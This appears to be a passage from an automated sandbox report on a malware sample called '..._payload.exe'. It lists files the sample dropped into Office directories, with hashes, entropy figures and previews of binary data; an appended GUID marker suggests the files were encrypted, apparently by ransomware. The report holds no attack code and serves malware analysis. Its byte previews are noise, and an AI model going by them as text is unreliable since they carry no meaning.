                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9080
                                                                                                                                                                      Entropy (8bit):7.979834817949144
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:+wQ5D0OLlCHbtaLXRrJSXKjR53jkS3di2YIxayr:dMDnLwHbcLXRrJSXg3jkSNi2HQA
                                                                                                                                                                      MD5:6F18EF649F15A079A8DD8F53966BB388
                                                                                                                                                                      SHA1:97819E5D4A020B7D550403EC05C0CAAE5046E9A8
                                                                                                                                                                      SHA-256:E182A4340795D346AEA3C987A83A8912A1886A88197B4D404814C9917A98033B
                                                                                                                                                                      SHA-512:6C67170C2BFB2C1AA044606FC12B8CCE132653510B904708EC348199F9AE363E916F3784A6347BCC27718F8D4727D0E09A7A7E4FEBCA64D6BDC947F3BECD473F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG...T.j.@A..k2...7Gj....-N ..L..M....A..T...r...wW.SG'..7B9...fw..`5....M+.d......5.S.+9."..};.i...#'..b....Ba"6$..U...(<..J.+...&.R....Q...4=g...)...6z<.y#ZM..H.yX.....Ge..oc*j.;.~...9X.......%....cqs....1.|...k.......W....<.:}.P.F1r..G..%Q.1^.u..N... ...pN.d}.#.3.7...D..x...{X...._j.....\....V.f~.^<.....c....}..l.p...=.%....V....0.Mj.,......=~....N2h.W".G.C..:hxH.xJ.'.k.T...z. .{csE...u i...WO..%.5..M..Z%...9.b.,.f.~/...2.Qp...%]..4..r_...s...$Bj..O..RM\.g.....:..7/..t<.o..'j0.".M.R.9....$...!...[7\#.vO..A...=.....om........R..x...[..+Q....6xM...4..h...oJ.7.T....T6.4C(TA/:..[...?....Kw...^~.W..$.L0r.......t.F(..3."..{.O.r=..G,b....T.L(...;..|6......c..wx.o.............W[............r..*.........Z....B...kk..'n..._..........X_.@..H.3........2.Y..y$H.H.s..Y..CU.9.}...R..JOLRf ..^.S.....[ :m..I.\..+g......(@W&.%>7...\...!.....'..Q..!s...(.w..O'om.)..;U..R\.;6P9..E..v*.........0BM!...AU..M..Rs..;..,.U .NV...+...Y.f.h.....$.hIm.8...g.uf.....;.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{6D74D3E2-198E-4F92-BDE8-15D234E7DBED}\{FD5FD857-5A38-4C81-A322-3226BB279FAA}mt45299826.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9025
                                                                                                                                                                      Entropy (8bit):7.978495371822946
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:1slteXeLmCa2WEgrO1JA28DcAnrnR0NzVeEgm5t/B436bNrOu4vkfJf:qoWaVN2dergxJxHB43bu4vkh
                                                                                                                                                                      MD5:4FBFF7FED7E405957E326F6F899A30C0
                                                                                                                                                                      SHA1:977B5C0E82220097AC1D90D50FCD7301CDD75086
                                                                                                                                                                      SHA-256:E5A57FA056C1BE80308FF419E6B6D8370828F670F3AA6C79A5D880288E19C7BC
                                                                                                                                                                      SHA-512:2402A1BD51A3CEA570DCF9E091610FA037BEEE38B6236624A9655C1D5C5E15DFD075DB8C88807C119B7F949D7D271F6F370F3B9798BE4700C559222CB78CB94A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG..o.O..5.v........c................U.s.6..nAN.9.c. [R.6.k.......BU.......W.ixt....w.Qw}Q....../.}..E.P9gz.......XV.!..,..c...r.\l.&g.$....g.0.w...:(.%.JB@.z[.I.2...'.L.S...V.R.l.HTEg......~L..e..vt*.....l4..2.,..&...),.J....`}Q....;...|....#..v.B.....x.]..}..~h...J.`.2[.AUgI..&N%...D...mq-M'.L._Tx..<U1...X...{.F.......M....@. .dlS.H..h)..<n...a.....0.O...>.W2q..e.....S..{\[N.Y..Y...6.EE.....%_..)T.R.E1......8.'...o.R#...Lx..S..:..e.>#L.A....:/.e.G...|...0.^.V...G..y..u..M.U......L..#:.9G.....A.....5.q\....XL..)....v.j.2.I]..I@....Pz......a..(......Y......E6e..!/....w4*j.pq.T..o...1...V6.j......b...I..(.F0.B....j..#..`(3.o.]....Y..n=..0k..J."...eHh..I...7..K^2..?../&.B.w..;q..s..~g.p..\.o.d....Z........8KmP.i7U...S)V....V.`.....M+..)..V..ek;...&..ur.e..LI.).........p...R.0.'L.`..B%.,..0.p.I1.X0......,..;<.eg....3I..B2h...5.]..%...G..A.+....o}.......G...[..A8.".j.v%D.......P'...j.."...h..I.z....L`:gI.|C.!!..../.9.......v..3..a.Yu..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100106v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1379
                                                                                                                                                                      Entropy (8bit):7.863635693864646
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SDLIwHpT/ToXrTz7yLQp5vcHfYH4CiP2iHziazNbNpfWfYgOMhZmRBSUZie2bD:SwwHpLTgrT2Qp8fC4DI2bNpfWfdOM0SB
                                                                                                                                                                      MD5:BA305DC84E58ED76FD22129FF4BB3E7A
                                                                                                                                                                      SHA1:4ADFCBF4FBE4C4FABC1629D814B61817353AD235
                                                                                                                                                                      SHA-256:F52F3FA6D232249C00C4B22E9F8D74EB52F1C8CA33196756ACECB3EE94A86EA8
                                                                                                                                                                      SHA-512:814F2EC4E60A27CC0E9F8D08FAC7916BF23FA9970AD997CAFDB56C3E6C1417A48FE0B2C01EF8D6DE6A824F67474AD6682C90C1F471D05FA604B21672C562A989
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.v......~...{..$O.R_.r.p..[..x...<...^...g..R.0.\....oz........-.B...q.d*..r..O...0i9..~`.h{..!ftx...clm.*..Yv...J....Q.`....V.FW.u.9...dJ=.I.:.;.6.zB....E!i.y......>3..a.A.-qc.3...G......T..[...!@.*.Wu}U.=.....W......c2_.......:y..(P4..`e{..........j.......t7.*...D...k..x......._q.a,........6.W..2.'8_Qg#.4MR.9h...O.I..U.....|....y^..q'>,....&...#.R.]t_I.5.m:.o@.'lq~...|.Vs&L.I......H.M....l.\.:.6.......cFtd....hqW.hs...p.Y,#..c.....zp....'..'Fv.1.l..YE.t..D......L...N.7#.M@.A..S.............h"...y....\.....OS. ........p.- h..0 .{fl./|.S.^.S........~SA.S ....?o.....".....[;--BX...........N..CR....B.["f...uA. ...`..,!.....#H.0US.5.....$...{.|...].......\....i.r.ej..xI...G.U...].`...!P.j&GJ.:HXf.~.j.|U...Y.....B..x.XKiJ....g.M...M.3.]...p$..Xc.A=-w..Ns.+..._.).C....-.R.....X..g.slS).u@.Xh.R../.|2...W...2..Y..=#.9...*}Rhu.B..w(<0%AJk...m......8.......8......W.Yv}...&<..Tv.8..<..\I?..){.?m.Y_.T..q....\..... ..F...UihS...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100109v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                      Entropy (8bit):7.760313950667388
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:QSIxs2jwMt7VjxqXv/WOqvgkljUdD+5rgtoVHmtdbgycVxcNfKok0/u+TSUdNciD:QSMs28kFxyq9jUooWmtdbA2BA2bD
                                                                                                                                                                      MD5:11133D10CAB38897EC189B8D91470195
                                                                                                                                                                      SHA1:73CFF17321EF644D2D67B378C83A26C72FA904BA
                                                                                                                                                                      SHA-256:638AA06B3F5FDF5DEE113AB68FBE34777D3232C14B61CF20B47B468AAFEDB7D7
                                                                                                                                                                      SHA-512:7CB3B5C1395BCCEE8FB9596C4EE240F9AFA5F1CAAF0BA79AC685447FF6F1807935917B55922DC1E25C89C1A312A0648FE9DDC7335EF04DC101F09184E1354934
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml \...s....VQ.<{..w1>a...D.F.G`........q.r.p...b.HvK..*P..4b.,As..R...v.c...U{.....q.=./.2.-.Dw....Z=.%......=k..w......X...4B.....WIU....`..8.j{0%.J.....a._&.)-...L..x....Ud..G...6.....9...t..........p./}U.....p.;..c.......f4...G......qLx..X...]T.o.*...~...z....E.0J..G..z..k...[.?.K.s]. .^.W|...#.v....6...*..{U.O...>.H..&...c.Pt.....i.S..>-c.x.A.-.$L...o../.....<.0Q.3n<.5n3.B....1|C(M^..Rm....|.b..................LF..|.......,.......f.....+.G..<...l0..K.$...d.w.(l....!FB....v..$n...wzx.....D......E......9....)c.O.<"o_..-.:EF..}..3..b~..=r;F.!;...W]J)v....|.."...Z....9A^pS........A......Jw..:.ak.f..Yq.....4.+......A.0._.^..zA.X...RTI."......gtt....&x.....>.^O..J2.&..b..n.......|E}......&....x|A.p~p.Q.....e......z.S...2-.9.4}...]NC.oo..o...:`@........x.S.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100110v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):794
                                                                                                                                                                      Entropy (8bit):7.759236550011036
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:a93RPCnox3/xKPkWmDvrtFWS+LJHppP2bD:a9EoXRPzriS+hsD
                                                                                                                                                                      MD5:58839DE6C20637C60B7E223AD9A25A5F
                                                                                                                                                                      SHA1:A6A6C7AB8A5227E2619CBEBB0F827F6368563C78
                                                                                                                                                                      SHA-256:5DDF99EBA27DD95E9A5EBF95AB6400A51EAE5CD7B861F28E7FEAC24DB2C014EC
                                                                                                                                                                      SHA-512:0858D139907AA0ECA63B673778351D5A2906B2CDEC7D9523E46D5CEE017A951F36D8E6BBA7DD773D538DE025BC12CDCB4EF82CB21635B7EACB6569A5424EDBE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..2B.5.3.F..s.M..P.La.x.;@.W6sH>a.P.b|.16D(,S..2!.....$gv:.1...n".R..4.`5..t`vH............n o.$e....k.p@...)....%...k..l.*.*/......r..9.b...r.k....5.....UE.d...gw)U..UE....,...._.u..........B.....,...n.>H...[.]8.Q6.. ...Z"........qK..>.2..u.9&.....G..T...l..8tfs..[...F....d.-m.f...F....(X..#....b..T.x.8..`.'... .[...G(.f.I.k...%...d.H...).3.....T...E2.K.W.&.....(f...]CO.ya.S....=O.;.f..-...j..g...7...b..G.*gn.....w.......].k}....w.,.\.N..%. }).....+q....IUe9.g..&._$...x9.....FV.w_{.......J+.4....q~.@.....6.D.|...?J...rSF_=..ij{QO...G..D.. .i,....#n.:...d..Aq..........i...d....0@=...Z.........5...b<.n.+.9..4w5....a.?B.....p.5.l\.5.MEXl,.}...&..+.S.....@. .] Q...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100113v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):793
                                                                                                                                                                      Entropy (8bit):7.74735793529353
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6rs8I7A+VPDzN7komji0SHN+FKY02BZrX2bD:eOA+xzN7kRStYKY0yZUD
                                                                                                                                                                      MD5:1A61ED8A309C4FC6BDBB98D20FFB3EA6
                                                                                                                                                                      SHA1:F20B6F422CE157688D4F945259F7506AEAD179B4
                                                                                                                                                                      SHA-256:47A0931416B3C9CC9A26DF6864E9D973FF86B40D3FA5625B3B2609BCCCEB9E64
                                                                                                                                                                      SHA-512:A40EA940F62D8AABA81920091C88D87E61737134F6466765E4CFAB5FC011327EC0F481A88920AE255A3A14388C6C736B5EEEB92066163048EA7F0867F4661E71
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..e...]g.,... ......Q6.Y....[..5..E.2..(.kS....Yg#J.(@..E....w.S..@iY..|...+tf.#>...#..Q=_..... .*1..KwT..v....y.....e...p.][.O........=.Y...$K.5].X.Y.X`.ct..|*.'......{.(....^_\..A._.8.D.....N.......n.G..HNC....hd...Ev.~.\i2.....#aGkP.bf..h..U.+...N.7;.}K..%">..!.).p........Tx.+...O..e]...m..Z}...^....5.s..B.......D.F.p.R.....zl<7.\n..Gd...&C...".....B..%'..K..,......-.........X".d.....jw.I...CXn"x.0S....j.Q..z.f..z..o.J.Sz......V.y66...t#..]..g........n1.'].A.<u.(.O.R....Xwa.3.I....S.?..-1..a......Q(Mq...K...y.T...D%..f..i?...P...+.......{E...5.....MTA.n._.....*..I.2..h.....:.[... Wj.."c.....<......={=.6"....{.......l.....'.bh...?.....{.@.A.o+C..n.u..K2.~P...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100114v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):794
                                                                                                                                                                      Entropy (8bit):7.705624131936589
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ARuEiF6+MgmFtrhi9K9KIJWX3qnurt9Tpdr6Xc+2bD:NE9+VwOdIkX3E6jr6XclD
                                                                                                                                                                      MD5:E7550B8AE7A6B678A358D8E6FD1CDA4B
                                                                                                                                                                      SHA1:CD0CB125121C0325466E7F06A6E21465AE0F852D
                                                                                                                                                                      SHA-256:5B2391DCC316339EE251BDF20449CB1C35198F78BB11255413034B8A5FBECFDE
                                                                                                                                                                      SHA-512:D5387710BF44D9781E8E6F7187E8A8DD3C7376B05856AC9FD1B6BB46AF10C7CEE893975C3F73592F76728450506A2288C16A0C6F83439C65A82200EA6F2252AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...N&.}8.t..B.]k..V(.5.v..........L#.L.VF....p.W[].x.N..........p.u.E."n......6Z].1..v/zx/.b/'..hA...../....'..N3...J.U*....1J~S....z[....g..L...!DY..H=6........,..<6R.S.87.......b.BM5P3z.{.3..ln....R....sp..m..F+...=.8U..sY..*,..S..a9SL..:..+....,J=B.o...:....G..|.aIi.H[Z.a...7..U.l+..>..].......J....y...7.\U.G...$u.).RG.Gm...B.up..]$.|.....a(G.`+M..B..8..}....>;...z....M...4.;yw....>.KK..9yug.).g...//U..d..ft..+.<.A.hp...w.>..."PN`..j..u..m.gt.8}....l9..,....|.uQ...B.^F...eC.....`p...t .e..,.v...j...b.....6....+.G.<C..v....Uo....8~W....^."...... cM..2d....s..3J..D......Z.T.:..P&.+..L...iP..@y:j%.F..a>...>g...+y..%..f..Q...@M..9..< .....@.N....'.K+.({..?./..;.%.R..(.0mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100115v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):793
                                                                                                                                                                      Entropy (8bit):7.730210515409357
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:90BNMqs6HLFDqWT1arKZGNT7TRaDJRx2bD:QM1wFDVQOQZ7TRaDJID
                                                                                                                                                                      MD5:1D867A3CC8DDF885081A5BCDFB37330A
                                                                                                                                                                      SHA1:9CA7C50D0344F69A3D674CC3BA8BE10D5B47FDDF
                                                                                                                                                                      SHA-256:A1C1F93BFE51D1780EDA24255B81364BFDDC77B2542CCE3E052A92FE03208C40
                                                                                                                                                                      SHA-512:3BB7CDE851DDAF3319804E6278AF635AF8525E16A08E99CE8439B14BF70AFC8E24F96CA967B3C349CED31B5F0B4DB9F5E722307BA613BE8003154676956EED0E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml."..1.I..i..hAsP.2...j<.)]....v...F..../...7.{.....e~P.^..n.....z......2.o...E.O..E....].X.:...).........0.^...s/..."..,.>..S9.(.;.......rG..S@.c...v,.N..3{i......F..e.2D..^....tV.........\\.....b.......=.u.H{...b.U..].J.......&X.<........c..G....U.Y..@5..r....l.1N.bI.zv..u..r...+3.....1%........2..%.?...=.9 9.......S...}.WJ.....p"=}.a..+.`..C7...4.a.W........F.^:.Z.~..[?}a....r]2......P..e+.."..A...f..T".....xp>(o..V..e....0.......B\..C1O.;...}a.F..j.F@...W.RJ.$........,.m..=....8.0.Y.?.4a..rqU.\8.>./k...E....?d...b....W....krX.uuX&... 7A..]U.%..Gl....1RGP.X..Q[.EW.Y}z..Wn....F......L2...8|.......y..X...8.Df.I..Z+h.p..q.D..hK..D^6./.....8u@k$N.:...r4$.+....[...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100116v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):795
                                                                                                                                                                      Entropy (8bit):7.750803463683358
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:WwuMv4Rw35H5A8lBPhljgAE+0dV66j3JECHLIwirqXjqrGjVwdQZ5dHCSUdNciik:WTgflLNahs6L8JMVHZDx2bD
                                                                                                                                                                      MD5:767383D84C670814A94862AB21D3555C
                                                                                                                                                                      SHA1:AC19054F9E6E3C475E558A27B428ACC9D600F1B9
                                                                                                                                                                      SHA-256:C8966907F98C044B33AE20E36B6606713C8C49CA3EEACE115DEE91AC31C29936
                                                                                                                                                                      SHA-512:758F78A3BDAABFB1EC0200BBA12F126B864D5E5EA12245CFF9C49DA554F6736BFCA685190055007BA862629808BDA1E5399FFD77E524F543F7E2AD5FC1DFD495
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..s.......CH..]........-....n...7(vP.;e.n.Q_..].....1K.A.?.6".)Wt?.}..:..(Zy.....IF..9+..3n[g..O..8K....Hf..f..L...-.<R...Lg....V.D.....).....k.z...q.]OBO....PFA. ....D+..M.U...~h.v..gh.e.D.L.o.>..ae::.Q..qSw......3..o.zKPT.+.*....Y.Q.k.K....Qq".*1...-.ZS>...vN.&k7....s../#v...@._mA...j...g.aly.....a...~....... M...O....Y..X.i..,..,..?:^.j.._@...........&~..2..BlL..S.............s.2...4l...}x]......Bh...."..@..u......rHj.I...a._..~y.....Fd1.{....s...VE..x1N.,.w....Y.E. .../..m`L>..PUa.cj_......].....3..K..h4YZ.*Ur.X...21P..L.8.J..X.......P.....i.C.4..}..O&..s8I.2../+j..3.......[tK'..$..2n...Z;ep7q...".Jb.D.8+tb..$....b....:.........6.....*%........\...C.uu...m...|.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100117v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):869
                                                                                                                                                                      Entropy (8bit):7.76514226609139
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eR58zPTeBa0jsAaQMuo0vndPPcuKr9wTeGaVdF8T+92bD:zzPT0bvndXcuKr0exF8T+WD
                                                                                                                                                                      MD5:4B9B59A9DA2DE1D5B4925DDA4F6E8F90
                                                                                                                                                                      SHA1:36EA5E436AB6E1AB2C55C6EC737759A02212BF10
                                                                                                                                                                      SHA-256:F0017C8A562DAED97CB22EF3EE9A7B4E224751EA0A2F49F37209A356F7DDFA17
                                                                                                                                                                      SHA-512:7BDB55F34876A6C27AAA66EC56AFC054C0BD5FFE98712A16D6ECFF5FF39717A3DA6CF3A3EDD06BEDAA67D4A9442307DD76BBD8E9A074611257B344A12F5E1CB8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.%..0|..Q....c..t........kU..i.....Q..$.P..A[.X.iGI......V-...w.*.u..br..xu.Vc..L..B^.h4....?..N.o..\...C.&......!.M[..(. .)Z...@..=.......d.~..4.J.K..2.e?|.7...W..{..=<.,.5.:{li=~J.{...|.>$Q3.d.zCn{/.T..(r...,).1...#.~S../..l...A.v=@iyy.....KRE?-w...#...|6.......i.......Z.v..D1O......*!N...5T...D...>!HYC..f.....T....l.j....W..p..q6..g..;...b-.~.F...)B../^....;.,4.!W.F......T..F..>...T.:KB.%._.#$..E<.d...e./.G.d]..u....^.....6u.WY....|.C...;tX...4..O.B'OW.TG`.T.p.sv..D....l%.........~....c........h.}..A.i.............%.z.n...75..f..#(,........$.Nd......*ey}T.].6..Vm.U...*......T.......^y..$....".K.B=|.....p.-lt.P...Z.Nb.H..zD(r..a.Y...{.#5.|.<&.v......W.k....]YT......<?;.)e...Tg..K.0...V....-.....U...C.h...g.........a.\.O.n.x2.Cx.|......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100118v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1014
                                                                                                                                                                      Entropy (8bit):7.784802963672669
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BQikNOtWLZkKGqkKsD7ziS1NM2eX0NW2bD:yikayxUniSzM2eX2dD
                                                                                                                                                                      MD5:2AE054C4817B3C54CCC0D4012A6F1CE5
                                                                                                                                                                      SHA1:A3C5139BD097F4CE9AF7B495FD8443CEB895870B
                                                                                                                                                                      SHA-256:60FDD02DA9C29C42B768E638F0F0849A466127F058D49CC81CD9B21BDC681048
                                                                                                                                                                      SHA-512:90E366C8CECC970E826E26118F0495CDDED54C7E9D491898C8136D62D59A32D6B3B2F980F01DD208164FFD9AC154E5F0015DAC9D8120F4C3EBCC1BAA075B3863
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.B...D..h/.......KE.....;...b.o.d.-.$....O.k.\M%......R...h...1+a....3..~....&.."..#H...."..........~..k}.2.......u.....awl1.~86\.Xy.z...v..C...^........;@+5.U..&+.x.3.)..J..E.R...d..=>...p.@)...E......f..[....T.oe1........".>...3o..+...x.9...L....x...j9&..].j.u.w....qp>...]..a...fW.v?.-..(...l.{...?.qF6..*.aM..)........j.......e.W...-k..A1...!J..l..q)H.n.%.....E@.ra.z.h...m.+.\...P..w....e.(.......'G._.0.!.B?@......~....0.h..?!..e...T...].@..r......(.N....}....RC.a....7x.ha.%.2.X....,.......=^./.|...nt....k.Z....].o../../..~.2.)....Cjs.m..+...J..l..".!...e...t..Z.jI...\.i.D\z.w.~qs.........U."..R.3.+..=z..H.H.1..+#..f.......=.nBr?>./ls.k.....94.RD.g/.. J:n......h|..1.6...B.e.O..]._..V..jh|j..F-P_...h\P.x!.G^r...tY...qH.....OO...H........Y..8s=.l.@..^.. .. ..J..K*.l..~.I.............z4.{..G.$..P.=9...7k..$su]...{.M..H..xI..7..BD.....I.....en.`^...I.#:..B....^.(.....0J=/.....:.QE..pkmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100119v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1471
                                                                                                                                                                      Entropy (8bit):7.8828521278525585
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:PeWacp11SjNHZeCXQhF9mfkDL+i1tDuejugpHFPxyDOHw91/EFHtMM/gaYR35+sw:PEcp1YjhZeAkMMGiHjuuHqiQ7CpYR358
                                                                                                                                                                      MD5:3D183A8DA042C6A71D565445BF7F0C40
                                                                                                                                                                      SHA1:A515864664669BDD9EF196A5FF7DA1281A3C6786
                                                                                                                                                                      SHA-256:14323862431C890AC1AF074F558B6403463F610CED8D88F848443E57941B0F3A
                                                                                                                                                                      SHA-512:7878B6116F5BEC1E2D00C86B1FE4F411A60B46A8D1E0B104A5D6FAACFC86EFB83BE1EBEACDF9A2444F6DA64787CE862CEE4B4B11820C8BB8B1A01CD4E3E74C3B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..f.G...........H/<.NW..Hp.......YxU...o.A...H3..:.....^.<.t.q..2.19...*Q....p..#.V......2....w.../{.?.udcI.....M(.....ny..Ao..g...0hR..8......2........@eH...bf...'...d.-.2....1.|#-K...C{..@8..P..)..G.$.....aSsI..Tn.+.>.O...^&..{.......:.....2C.=L......w.....[..i+]nRl....V...... ...Y..M..`..e'f...i...&VX...N.^..g..(....HP..:......C.4.E...*.O..{/Fy.gy..an....&.......)....`..m!...w..4]O.o.j.@.....z..1uJ.&.>.>,.mJS....{B..Y..9g...=<..ci1.Zo.G..C.V..o..E.T.-.e....>.Vk...B.....&F....FY..6...;....<.A...3..Q.}R...M....Ub.y.|Ko...EwvB..(.F..N...qe..4;..Y..BInb..4....WZ^.M.}..A..;..#..i..c...d....V...C..{w.]J.....k..^...?._y..3.....8b...@.eB.iV........*.L.....6.i.g*m.....< ..w.3...Y..(...LO`.[q..]C....E>...>...`f..!.F-6..:.....\.... O.......[...F..;:/..$...o$}q...56..:f.._W......g..O..;A'.X.y..,~./.1...v..n...\e.. .S...P;..&..Z|.....4...$....@...]..c...{...s&d....".E.AD...!....8....E..`.......u....N.oHI.....{.6..RN..~l.....%._^|;.v.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100124v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):743
                                                                                                                                                                      Entropy (8bit):7.742772323231248
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:irxzZmq7gv73BjAwtnR/zpWc9iA0Rk/xrtEGxbouqEO1wzYBWYA3JGolMqSJWFSw:I/mOgvrBjAwfscER2zESMEyeYgYpPYow
                                                                                                                                                                      MD5:5F7A784D20C47D5699B6DCD4839BEAFC
                                                                                                                                                                      SHA1:728C1DF555F4E97BD2344D04F5FA8805171DAEF3
                                                                                                                                                                      SHA-256:0275B4874DA49EED0F03E49F25C32B1510FA1035720769A34D253510617C4A8A
                                                                                                                                                                      SHA-512:4C31B2456B42517DADC0FEB6869239ED7832945B7AA87112BF855820DBD21F32EB48D68E0F612CC63AAC0A49B55D845C5D2F5B8260821A973CC6812C62F4F1E7
                                                                                                                                                                      Malicious:false
